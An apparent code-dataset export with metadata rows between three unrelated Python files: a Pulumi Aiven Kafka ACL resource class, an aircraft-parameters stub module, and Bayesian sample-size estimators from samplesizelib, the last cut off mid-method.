def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
permission: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## # Resource Kafka ACL Resource
The Resource Kafka ACL resource allows the creation and management of ACLs for an Aiven Kafka service.
## Example Usage
```python
import pulumi
import pulumi_aiven as aiven
mytestacl = aiven.KafkaAcl("mytestacl",
project=aiven_project["myproject"]["project"],
service_name=aiven_kafka["myservice"]["service_name"],
topic="<TOPIC_NAME_PATTERN>",
permission="admin",
username="<USERNAME_PATTERN>")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
:param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
:param pulumi.Input[str] service_name: Service to link the Kafka ACL to
:param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
:param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: KafkaAclArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## # Resource Kafka ACL Resource
The Resource Kafka ACL resource allows the creation and management of ACLs for an Aiven Kafka service.
## Example Usage
```python
import pulumi
import pulumi_aiven as aiven
mytestacl = aiven.KafkaAcl("mytestacl",
project=aiven_project["myproject"]["project"],
service_name=aiven_kafka["myservice"]["service_name"],
topic="<TOPIC_NAME_PATTERN>",
permission="admin",
username="<USERNAME_PATTERN>")
```
:param str resource_name: The name of the resource.
:param KafkaAclArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(KafkaAclArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
permission: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = KafkaAclArgs.__new__(KafkaAclArgs)
if permission is None and not opts.urn:
raise TypeError("Missing required property 'permission'")
__props__.__dict__["permission"] = permission
if project is None and not opts.urn:
raise TypeError("Missing required property 'project'")
__props__.__dict__["project"] = project
if service_name is None and not opts.urn:
raise TypeError("Missing required property 'service_name'")
__props__.__dict__["service_name"] = service_name
if topic is None and not opts.urn:
raise TypeError("Missing required property 'topic'")
__props__.__dict__["topic"] = topic
if username is None and not opts.urn:
raise TypeError("Missing required property 'username'")
__props__.__dict__["username"] = username
super(KafkaAcl, __self__).__init__(
'aiven:index/kafkaAcl:KafkaAcl',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
permission: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None) -> 'KafkaAcl':
"""
Get an existing KafkaAcl resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
:param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
:param pulumi.Input[str] service_name: Service to link the Kafka ACL to
:param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
:param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _KafkaAclState.__new__(_KafkaAclState)
__props__.__dict__["permission"] = permission
__props__.__dict__["project"] = project
__props__.__dict__["service_name"] = service_name
__props__.__dict__["topic"] = topic
__props__.__dict__["username"] = username
return KafkaAcl(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def permission(self) -> pulumi.Output[str]:
"""
is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
"""
return pulumi.get(self, "permission")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> pulumi.Output[str]:
"""
Service to link the Kafka ACL to
"""
return pulumi.get(self, "service_name")
@property
@pulumi.getter
def topic(self) -> pulumi.Output[str]:
"""
is a topic name pattern the ACL entry matches to.
"""
return pulumi.get(self, "topic")
@property
@pulumi.getter
def username(self) -> pulumi.Output[str]:
"""
is a username pattern the ACL entry matches to.
"""
return pulumi.get(self, "username")
| 41.875312
| 134
| 0.630955
| 1,994
| 16,792
| 5.152959
| 0.089268
| 0.073869
| 0.09129
| 0.064234
| 0.823747
| 0.788029
| 0.768954
| 0.733431
| 0.723309
| 0.716788
| 0
| 0.000082
| 0.277573
| 16,792
| 400
| 135
| 41.98
| 0.846921
| 0.391853
| 0
| 0.584541
| 1
| 0
| 0.088681
| 0.003187
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154589
| false
| 0.004831
| 0.024155
| 0
| 0.270531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f205cfd8cf35b9d5516674b13bd5fdf34cb57f27
| 9,009
|
py
|
Python
|
aircraft_params.py
|
muratataturo/IAEA
|
2cf3ad4feed4ced0256f3f04ceb899ee12fa53a3
|
[
"MIT"
] | null | null | null |
aircraft_params.py
|
muratataturo/IAEA
|
2cf3ad4feed4ced0256f3f04ceb899ee12fa53a3
|
[
"MIT"
] | null | null | null |
aircraft_params.py
|
muratataturo/IAEA
|
2cf3ad4feed4ced0256f3f04ceb899ee12fa53a3
|
[
"MIT"
] | null | null | null |
import pandas as pd
# For computation
class AircraftParamsComputation(object):
"""
--Attributes--
aircraft name:
type(string)
aircraft database path:
type(string), path of aircraft database path
"""
def __init__(self, aircraft_name):
self.aircraft_name = aircraft_name
# path of aircraft database
self.aircraft_database_path = "./DataBase/aircraft.csv"
df = pd.read_csv(self.aircraft_database_path, index_col=0)
print(df.columns) # extract column
print(df.loc[self.aircraft_name].values) # extract numpy array from database
# Initialize parameters
# deal with following value by ft or kg
# fuselage
# fuselage is divided into three section(section1: cockpit, section2: cabin, section3: after cabin)
self.cockpit_length = None # l1
self.cabin_length = None # l2
self.after_cabin_length = None # l3
self.fuselage_length = None # l1 + l2 + l3
self.cockpit_width = None # w1
self.cabin_width = None # w2(df)
self.after_cabin_width = None # w3
# Note: cockpit and after cabin shapes are circle
self.cockpit_upper_height = None # the height of upper part of cockpit
self.cockpit_lower_height = None # the height of lower part of cockpit
self.cabin_upper_height = None # the height of fuselage which contains passenger
self.cabin_lower_height = None # the height of fuselage which is determined by cargo fuselage
self.after_cabin_upper_height = None # the height of upper part of after cabin
self.after_cabin_lower_height = None # hte height of lower part of after cabin
self.KWs = None # costant => 0.75 * ((1.0 + 2.0 * taper ratio) / (1.0 + taper ratio)) * (main wing span * np.tan(25 * wingsweep_theta / fuselage length))
# main wing
self.main_wing_span = None # wing span(b)
self.main_wing_aspect_ratio = None # AR
self.main_wing_taper_ratio = None # t
self.main_wing_tc = None # the ratio of thickness and chord
self.retreat_angle = None # theta
self.main_wing_croot = None # the root chord of main wing
self.main_wing_ctip = None # the tip chord of main wing
self.main_wing_area = None # S
# self.Nz = None # ultimate load coefficient
# vertical wing
self.vertical_wing_span = None # wing span(bv)
self.vertical_wing_aspect_ratio = None # ARv
self.vertical_wing_taper_ratio = None # tv
self.vertical_wing_tc = None # the ratio of thickness and chord at vertical wing
self.vertical_retreat_angle = None # thetav
self.vertical_wing_croot = None # the root chord of vertical wing
self.vertical_wing_ctip = None # the tip chord of vertical wing
self.vertical_wing_area = None # Sv
# horizontal wing
self.horizontal_wing_span = None # wing span(bh)
self.horizontal_wing_aspect_ratio = None # ARh
self.horizontal_wing_taper_ratio = None # th
self.horizontal_wing_tc = None # the ratio of thickness and chord at horizontal wing
self.horizontal_retreat_angle = None # thetah
self.horizontal_wing_croot = None # the root chord of horizontal wing
self.horizontal_wing_ctip = None # the tip chord of horizontal wing
self.horizontal_wing_area = None # Sh
# main landing gear
self.main_landing_gear_position = None # the setting position of main landing gear(Lm)
self.number_of_main_wheel = None # the number of main wheel
self.number_of_main_gear_struts = None # the number of main gear struts
self.Vstall = 130 # stall velocity
# Nose landing gear
self.nose_landing_gear_position = None # the setting position of nose landing gear(Ln)
self.number_of_nose_wheel = None # the number of nose wheel
# Nacelle
self.engine_number = None # the number of jet engine
# Engine Control
self.engine_control_position = None # the mounting position of engine control
# Flight Control
self.number_of_flight_control = None # the number of flight control
self.exposed_wing_span = None # outer wing span (BW)
# Instrument
self.number_of_instrument = None # the number of instrument, jet engine(2.0), UAV(0.5)
# For View
class AircraftParamsView(object):
"""
--Attributes--
aircraft name:
type(string)
aircraft database path:
type(string), path of aircraft database path
"""
def __init__(self, aircraft_name):
self.aircraft_name = aircraft_name
# path of aircraft database
self.aircraft_database_path = "./DataBase/aircraft.csv"
df = pd.read_csv(self.aircraft_database_path, index_col=0)
print(df.columns) # extract column
print(df.loc[self.aircraft_name].values) # extract numpy array from database
# Initialize parameters
# deal with following value by ft or kg
# fuselage
# fuselage is divided into three section(section1: cockpit, section2: cabin, section3: after cabin)
self.cockpit_length = None # l1
self.cabin_length = None # l2
self.after_cabin_length = None # l3
self.fuselage_length = None # l1 + l2 + l3
self.cockpit_width = None # w1
self.cabin_width = None # w2(df)
self.after_cabin_width = None # w3
# Note: cockpit and after cabin shapes are circle
self.cockpit_upper_height = None # the height of upper part of cockpit
self.cockpit_lower_height = None # the height of lower part of cockpit
self.cabin_upper_height = None # the height of fuselage which contains passenger
self.cabin_lower_height = None # the height of fuselage which is determined by cargo fuselage
self.after_cabin_upper_height = None # the height of upper part of after cabin
self.after_cabin_lower_height = None # hte height of lower part of after cabin
self.KWs = None # costant => 0.75 * ((1.0 + 2.0 * taper ratio) / (1.0 + taper ratio)) * (main wing span * np.tan(25 * wingsweep_theta / fuselage length))
# main wing
self.main_wing_span = None # wing span(b)
self.main_wing_aspect_ratio = None # AR
self.main_wing_taper_ratio = None # t
self.main_wing_tc = None # the ratio of thickness and chord
self.retreat_angle = None # theta
self.main_wing_croot = None # the root chord of main wing
self.main_wing_ctip = None # the tip chord of main wing
self.main_wing_area = None # S
# self.Nz = None # ultimate load coefficient
# vertical wing
self.vertical_wing_span = None # wing span(bv)
self.vertical_wing_aspect_ratio = None # ARv
self.vertical_wing_taper_ratio = None # tv
self.vertical_wing_tc = None # the ratio of thickness and chord at vertical wing
self.vertical_retreat_angle = None # thetav
self.vertical_wing_croot = None # the root chord of vertical wing
self.vertical_wing_ctip = None # the tip chord of vertical wing
self.vertical_wing_area = None # Sv
# horizontal wing
self.horizontal_wing_span = None # wing span(bh)
self.horizontal_wing_aspect_ratio = None # ARh
self.horizontal_wing_taper_ratio = None # th
self.horizontal_wing_tc = None # the ratio of thickness and chord at horizontal wing
self.horizontal_retreat_angle = None # thetah
self.horizontal_wing_croot = None # the root chord of horizontal wing
self.horizontal_wing_ctip = None # the tip chord of horizontal wing
self.horizontal_wing_area = None # Sh
# main landing gear
self.main_landing_gear_position = None # the setting position of main landing gear(Lm)
self.number_of_main_wheel = None # the number of main wheel
self.number_of_main_gear_struts = None # the number of main gear struts
self.Vstall = 130 # stall velocity
# Nose landing gear
self.nose_landing_gear_position = None # the setting position of nose landing gear(Ln)
self.number_of_nose_wheel = None # the number of nose wheel
# Nacelle
self.engine_number = None # the number of jet engine
# Engine Control
self.engine_control_position = None # the mounting position of engine control
# Flight Control
self.number_of_flight_control = None # the number of flight control
self.exposed_wing_span = None # outer wing span (BW)
# Instrument
self.number_of_instrument = None # the number of instrument, jet engine(2.0), UAV(0.5)
if __name__ == '__main__':
aircraft_name = "A320"
ap = AircraftParamsComputation(aircraft_name)
| 42.098131
| 162
| 0.662116
| 1,214
| 9,009
| 4.712521
| 0.131796
| 0.056284
| 0.029366
| 0.031463
| 0.972907
| 0.972907
| 0.972907
| 0.972907
| 0.972907
| 0.972907
| 0
| 0.009951
| 0.274947
| 9,009
| 213
| 163
| 42.295775
| 0.865891
| 0.399711
| 0
| 0.948276
| 0
| 0
| 0.011143
| 0.008838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.008621
| 0
| 0.043103
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f22074875d5aa2784e0e0d85aa42b3f1517361ff
| 32,000
|
py
|
Python
|
src/samplesizelib/linear/bayesian.py
|
andriygav/SampleSizeEstimation
|
079959711a46201e08ae3e0d41815bcb70d7efc4
|
[
"MIT"
] | 2
|
2020-08-16T18:24:05.000Z
|
2021-12-04T11:52:24.000Z
|
src/samplesizelib/linear/bayesian.py
|
andriygav/SampleSizeEstimation
|
079959711a46201e08ae3e0d41815bcb70d7efc4
|
[
"MIT"
] | 2
|
2020-08-16T17:53:49.000Z
|
2020-08-18T19:57:40.000Z
|
src/samplesizelib/linear/bayesian.py
|
andriygav/SampleSizeEstimation
|
079959711a46201e08ae3e0d41815bcb70d7efc4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The :mod:`samplesizelib.linear.bayesian` contains classes:
- :class:`samplesizelib.linear.bayesian.APVCEstimator`
- :class:`samplesizelib.linear.bayesian.ACCEstimator`
- :class:`samplesizelib.linear.bayesian.ALCEstimator`
- :class:`samplesizelib.linear.bayesian.MaxUtilityEstimator`
- :class:`samplesizelib.linear.bayesian.KLEstimator`
"""
from __future__ import print_function
__docformat__ = 'restructuredtext'
from multiprocessing import Pool
import numpy as np
import scipy.stats as sps
from scipy.optimize import minimize_scalar
from ..shared.estimator import SampleSizeEstimator
from ..shared.utils import Dataset
class APVCEstimator(SampleSizeEstimator):
r"""
Description of APVC Method
:param statmodel: the machine learning algorithm
:type statmodel: RegressionModel or LogisticModel
:param averaging: to do
:type averaging: float
:param epsilon: to do
:type epsilon: float
:param begin: to do
:type begin: int
:param end: to do
:type end: int
:param num: to do
:type num: int
:param multiprocess: to do
:type multiprocess: bool
:param progressbar: to do
:type progressbar: bool
"""
def __init__(self, statmodel, **kwards):
r"""Constructor method
"""
super().__init__()
self.statmodel = statmodel
self.averaging = int(kwards.pop('averaging', 100))
if self.averaging <= 0:
raise ValueError(
"The averaging should be positive but get {}".format(
self.averaging))
self.epsilon = kwards.pop('epsilon', 0.5)
if self.epsilon <= 0:
raise ValueError(
"The epsilon must be positive value but get {}".format(
self.epsilon))
self.begin = kwards.pop('begin', None)
if self.begin is not None and self.begin < 0:
raise ValueError(
"The begin must be positive value but get {}".format(
self.begin))
self.end = kwards.pop('end', None)
if self.end is not None and self.end < 0:
raise ValueError(
"The end must be positive value but get {}".format(
self.end))
if self.end is not None and self.begin is not None and self.end <= self.begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
self.end, self.begin))
self.num = kwards.pop('num', 5)
if self.num <=0:
raise ValueError(
"The num must be positive value but get {}".format(
self.num))
if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, self.end - self.begin))
self.multiprocess = kwards.pop('multiprocess', False)
if not isinstance(self.multiprocess, bool):
raise ValueError(
"The multiprocess must be bool value but get {}".format(
self.multiprocess))
self.progressbar = kwards.pop('progressbar', False)
if not isinstance(self.progressbar, bool):
raise ValueError(
"The progressbar must be bool value but get {}".format(
self.progressbar))
if kwards:
raise ValueError("Invalid parameters: %s" % str(kwards))
self.dataset = None
def _hDispersion(self, dataset):
r"""
Return ...
"""
X, y = dataset.sample()
w_hat = self.statmodel(y, X).fit()
cov = np.linalg.inv(
0.01*np.eye(w_hat.shape[0]) - self.statmodel(y, X).hessian(w_hat))
return np.sqrt(np.sum((np.linalg.eigvals(cov)/2)**2))
def _score_subsample(self, m):
r"""
Return ...
"""
X_m, y_m = self.dataset.sample(m)
dataset_m = Dataset(X_m, y_m)
return self._hDispersion(dataset_m)
def forward(self, features, target):
r"""
Returns sample size prediction for the given dataset.
:param features: The tensor of shape
`num_elements` :math:`\times` `num_feature`.
:type features: array.
:param target: The tensor of shape `num_elements`.
:type target: array.
:return: sample size estimation for the given dataset.
:rtype: dict
"""
self.dataset = Dataset(features, target)
if self.end is None:
end = len(self.dataset) - 1
else:
end = self.end
if self.begin is None:
begin = 2*self.dataset.n
else:
begin = self.begin
if end <= begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
end, begin))
if self.num >= end - begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, end - begin))
subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
list_of_answers = []
points_one = np.ones(self.averaging, dtype=np.int64)
if self.multiprocess:
pool = Pool()
mapping = pool.map
else:
mapping = map
if self.progressbar:
iterator = self._progressbar(subset_sizes)
else:
iterator = subset_sizes
for i, m in enumerate(iterator):
list_of_answers.append(
np.asarray(
list(mapping(self._score_subsample, m*points_one))))
self._set_status(100.*(i+1)/len(subset_sizes))
if self.multiprocess:
pool.close()
pool.join()
list_of_answers = np.asarray(list_of_answers)
list_of_E = np.mean(list_of_answers, axis = 1)
list_of_S = np.std(list_of_answers, axis = 1)
m_size = end
for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
if mean < self.epsilon:
m_size = m
return {'m*': m_size,
'E': np.array(list_of_E),
'S': np.array(list_of_S),
'm': np.array(subset_sizes),
}
class ACCEstimator(SampleSizeEstimator):
r"""
Description of ACC Method
:param statmodel: the machine learning algorithm
:type statmodel: RegressionModel or LogisticModel
:param averaging: to do
:type averaging: float
:param alpha: to do
:type alpha: float
:param length: to do
:type length: float
:param begin: to do
:type begin: int
:param end: to do
:type end: int
:param num: to do
:type num: int
:param multiprocess: to do
:type multiprocess: bool
:param progressbar: to do
:type progressbar: bool
"""
def __init__(self, statmodel, **kwards):
r"""Constructor method
"""
super().__init__()
self.statmodel = statmodel
self.averaging = int(kwards.pop('averaging', 100))
if self.averaging <= 0:
raise ValueError(
"The averaging should be positive but get {}".format(
self.averaging))
self.length = kwards.pop('length', 0.25)
if self.length <= 0:
raise ValueError(
"The length must be positive value but get {}".format(
self.length))
self.alpha = kwards.pop('alpha', 0.05)
if self.alpha < 0 or self.alpha > 1:
raise ValueError(
"The alpha must be between 0 and 1 but get {}".format(
self.alpha))
self.begin = kwards.pop('begin', None)
if self.begin is not None and self.begin < 0:
raise ValueError(
"The begin must be positive value but get {}".format(
self.begin))
self.end = kwards.pop('end', None)
if self.end is not None and self.end < 0:
raise ValueError(
"The end must be positive value but get {}".format(
self.end))
if self.end is not None and self.begin is not None and self.end <= self.begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
self.end, self.begin))
self.num = kwards.pop('num', 5)
if self.num <=0:
raise ValueError(
"The num must be positive value but get {}".format(
self.num))
if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, self.end - self.begin))
self.multiprocess = kwards.pop('multiprocess', False)
if not isinstance(self.multiprocess, bool):
raise ValueError(
"The multiprocess must be bool value but get {}".format(
self.multiprocess))
self.progressbar = kwards.pop('progressbar', False)
if not isinstance(self.progressbar, bool):
raise ValueError(
"The progressbar must be bool value but get {}".format(
self.progressbar))
if kwards:
raise ValueError("Invalid parameters: %s" % str(kwards))
self.dataset = None
def _iDistribution(self, dataset):
r"""
Return ...
"""
X, y = dataset.sample()
w_hat = self.statmodel(y, X).fit()
cov = np.linalg.inv(
0.01*np.eye(w_hat.shape[0]) - self.statmodel(y, X).hessian(w_hat))
W = sps.multivariate_normal(mean=np.zeros(w_hat.shape[0]), cov = cov).rvs(size=1000)
return (np.sqrt((W**2).sum(axis=1)) < 3*self.length).mean()
def _score_subsample(self, m):
r"""
Return ...
"""
X_m, y_m = self.dataset.sample(m)
dataset_m = Dataset(X_m, y_m)
return self._iDistribution(dataset_m)
def forward(self, features, target):
r"""
Returns sample size prediction for the given dataset.
:param features: The tensor of shape
`num_elements` :math:`\times` `num_feature`.
:type features: array.
:param target: The tensor of shape `num_elements`.
:type target: array.
:return: sample size estimation for the given dataset.
:rtype: dict
"""
self.dataset = Dataset(features, target)
if self.end is None:
end = len(self.dataset) - 1
else:
end = self.end
if self.begin is None:
begin = 2*self.dataset.n
else:
begin = self.begin
if end <= begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
end, begin))
if self.num >= end - begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, end - begin))
subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
list_of_answers = []
points_one = np.ones(self.averaging, dtype=np.int64)
if self.multiprocess:
pool = Pool()
mapping = pool.map
else:
mapping = map
if self.progressbar:
iterator = self._progressbar(subset_sizes)
else:
iterator = subset_sizes
for i, m in enumerate(iterator):
list_of_answers.append(
np.asarray(
list(mapping(self._score_subsample, m*points_one))))
self._set_status(100.*(i+1)/len(subset_sizes))
if self.multiprocess:
pool.close()
pool.join()
list_of_answers = np.asarray(list_of_answers)
list_of_E = np.mean(list_of_answers, axis = 1)
list_of_S = np.std(list_of_answers, axis = 1)
m_size = end
for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
if mean > 1 - self.alpha:
m_size = m
return {'m*': m_size,
'E': np.array(list_of_E),
'S': np.array(list_of_S),
'm': np.array(subset_sizes),
}
class ALCEstimator(SampleSizeEstimator):
r"""
Description of ALC Method
:param statmodel: the machine learning algorithm
:type statmodel: RegressionModel or LogisticModel
:param averaging: to do
:type averaging: float
:param alpha: to do
:type alpha: float
:param length: to do
:type length: float
:param begin: to do
:type begin: int
:param end: to do
:type end: int
:param num: to do
:type num: int
:param multiprocess: to do
:type multiprocess: bool
:param progressbar: to do
:type progressbar: bool
"""
def __init__(self, statmodel, **kwards):
r"""Constructor method
"""
super().__init__()
self.statmodel = statmodel
self.averaging = int(kwards.pop('averaging', 100))
if self.averaging <= 0:
raise ValueError(
"The averaging should be positive but get {}".format(
self.averaging))
self.length = kwards.pop('length', 0.5)
if self.length <= 0:
raise ValueError(
"The length must be positive value but get {}".format(
self.length))
self.alpha = kwards.pop('alpha', 0.05)
if self.alpha < 0 or self.alpha > 1:
raise ValueError(
"The alpha must be between 0 and 1 but get {}".format(
self.alpha))
self.begin = kwards.pop('begin', None)
if self.begin is not None and self.begin < 0:
raise ValueError(
"The begin must be positive value but get {}".format(
self.begin))
self.end = kwards.pop('end', None)
if self.end is not None and self.end < 0:
raise ValueError(
"The end must be positive value but get {}".format(
self.end))
if self.end is not None and self.begin is not None and self.end <= self.begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
self.end, self.begin))
self.num = kwards.pop('num', 5)
if self.num <=0:
raise ValueError(
"The num must be positive value but get {}".format(
self.num))
if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, self.end - self.begin))
self.multiprocess = kwards.pop('multiprocess', False)
if not isinstance(self.multiprocess, bool):
raise ValueError(
"The multiprocess must be bool value but get {}".format(
self.multiprocess))
self.progressbar = kwards.pop('progressbar', False)
if not isinstance(self.progressbar, bool):
raise ValueError(
"The progressbar must be bool value but get {}".format(
self.progressbar))
if kwards:
raise ValueError("Invalid parameters: %s" % str(kwards))
self.dataset = None
def _aDistribution(self, dataset):
r"""
Return ...
"""
X, y = dataset.sample()
w_hat = self.statmodel(y, X).fit()
cov = np.linalg.inv(
0.01*np.eye(w_hat.shape[0]) - self.statmodel(y, X).hessian(w_hat))
W = sps.multivariate_normal(mean=np.zeros(w_hat.shape[0]), cov = cov).rvs(size=1000)
function = lambda r: np.abs( (np.sqrt((W**2).sum(axis=1)) > 3*r).mean() - self.alpha)
return minimize_scalar(function, bounds=(0.01, 1), method='Bounded', options={'maxiter':10})['x']
def _score_subsample(self, m):
r"""
Return ...
"""
X_m, y_m = self.dataset.sample(m)
dataset_m = Dataset(X_m, y_m)
return self._aDistribution(dataset_m)
def forward(self, features, target):
r"""
Returns sample size prediction for the given dataset.
:param features: The tensor of shape
`num_elements` :math:`\times` `num_feature`.
:type features: array.
:param target: The tensor of shape `num_elements`.
:type target: array.
:return: sample size estimation for the given dataset.
:rtype: dict
"""
self.dataset = Dataset(features, target)
if self.end is None:
end = len(self.dataset) - 1
else:
end = self.end
if self.begin is None:
begin = 2*self.dataset.n
else:
begin = self.begin
if end <= begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
end, begin))
if self.num >= end - begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, end - begin))
subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
list_of_answers = []
points_one = np.ones(self.averaging, dtype=np.int64)
if self.multiprocess:
pool = Pool()
mapping = pool.map
else:
mapping = map
if self.progressbar:
iterator = self._progressbar(subset_sizes)
else:
iterator = subset_sizes
for i, m in enumerate(iterator):
list_of_answers.append(
np.asarray(
list(mapping(self._score_subsample, m*points_one))))
self._set_status(100.*(i+1)/len(subset_sizes))
if self.multiprocess:
pool.close()
pool.join()
list_of_answers = np.asarray(list_of_answers)
list_of_E = np.mean(list_of_answers, axis = 1)
list_of_S = np.std(list_of_answers, axis = 1)
m_size = end
for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
if mean < self.length:
m_size = m
return {'m*': m_size,
'E': np.array(list_of_E),
'S': np.array(list_of_S),
'm': np.array(subset_sizes),
}
class MaxUtilityEstimator(SampleSizeEstimator):
r"""
Description of Utility Maximisation Method
:param statmodel: the machine learning algorithm
:type statmodel: RegressionModel or LogisticModel
:param averaging: to do
:type averaging: float
:param c: to do
:type c: float
:param begin: to do
:type begin: int
:param end: to do
:type end: int
:param num: to do
:type num: int
:param multiprocess: to do
:type multiprocess: bool
:param progressbar: to do
:type progressbar: bool
"""
def __init__(self, statmodel, **kwards):
r"""Constructor method
"""
super().__init__()
self.statmodel = statmodel
self.averaging = int(kwards.pop('averaging', 100))
if self.averaging <= 0:
raise ValueError(
"The averaging should be positive but get {}".format(
self.averaging))
self.c = kwards.pop('c', 0.005)
if self.c <= 0:
raise ValueError(
"The c must be positive value but get {}".format(
self.c))
self.begin = kwards.pop('begin', None)
if self.begin is not None and self.begin < 0:
raise ValueError(
"The begin must be positive value but get {}".format(
self.begin))
self.end = kwards.pop('end', None)
if self.end is not None and self.end < 0:
raise ValueError(
"The end must be positive value but get {}".format(
self.end))
if self.end is not None and self.begin is not None and self.end <= self.begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
self.end, self.begin))
self.num = kwards.pop('num', 5)
if self.num <=0:
raise ValueError(
"The num must be positive value but get {}".format(
self.num))
if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, self.end - self.begin))
self.multiprocess = kwards.pop('multiprocess', False)
if not isinstance(self.multiprocess, bool):
raise ValueError(
"The multiprocess must be bool value but get {}".format(
self.multiprocess))
self.progressbar = kwards.pop('progressbar', False)
if not isinstance(self.progressbar, bool):
raise ValueError(
"The progressbar must be bool value but get {}".format(
self.progressbar))
if kwards:
raise ValueError("Invalid parameters: %s" % str(kwards))
self.dataset = None
def _uFunction(self, dataset):
r"""
Return ...
"""
X, y = dataset.sample()
model = self.statmodel(y, X)
w_hat = model.fit()
cov = np.linalg.inv(
0.01*np.eye(w_hat.shape[0]) - model.hessian(w_hat))
prior = sps.multivariate_normal(mean = np.zeros(w_hat.shape[0]), cov = 0.01*np.eye(w_hat.shape[0]))
W = sps.multivariate_normal(mean=w_hat, cov = cov).rvs(size=100)
u = []
for w in W:
u.append(model.loglike(w) + prior.logpdf(w))
return np.mean(u)/y.shape[0] - self.c*y.shape[0]
def _score_subsample(self, m):
r"""
Return ...
"""
X_m, y_m = self.dataset.sample(m)
